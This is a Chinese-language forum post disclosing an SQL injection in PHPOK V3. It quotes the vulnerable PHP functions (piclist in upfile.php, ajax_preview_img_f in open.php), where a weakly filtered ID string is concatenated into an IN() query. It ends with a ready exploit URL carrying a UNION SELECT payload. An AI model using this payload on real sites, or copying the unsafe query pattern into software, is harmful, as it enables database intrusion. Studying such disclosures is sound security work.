返回列表 发帖

Phpok3注入漏洞附Exp

发布作者:jsbug

影响版本:V3

漏洞类型:SQL注入
漏洞描述:phpok3SQL注入漏洞



漏洞代码:

phpok3/app/www/models/upfile.php

//通过ID串获取图片信息,这里获取的带有ID的缩略图

function piclist($idstring="")

{

if(!$idstring)

{

return false;

}

$sql = "SELECT id,thumb url FROM ".$this->db->prefix."upfiles WHERE id IN(".$idstring.") ORDER BY substring_index('".$idstring."',id,1)";

echo($sql);

return $this->db->get_all($sql);

}


IN()这里的问题,有点类似当年的Dz5.0 pm.php漏洞

phpok3/app/www/control/open.php

//通过Ajax预览图片

function ajax_preview_img_f()

{

//这里只是为了防止跨站,并且过滤的不好

$idstring = $this->trans_lib->safe("idstring");

if(!$idstring)

{

exit("empty");

}

//直接代入

$rslist = $this->upfile_m->piclist($idstring);

sys_html2js($this->json_lib->encode($rslist));

}


有几个同类型的就不再赘述了。


附Exp:

http://localhost/phpok3/index.php?c=open&f=ajax_preview_img&idstring=0) union select 1,version()%23

返回列表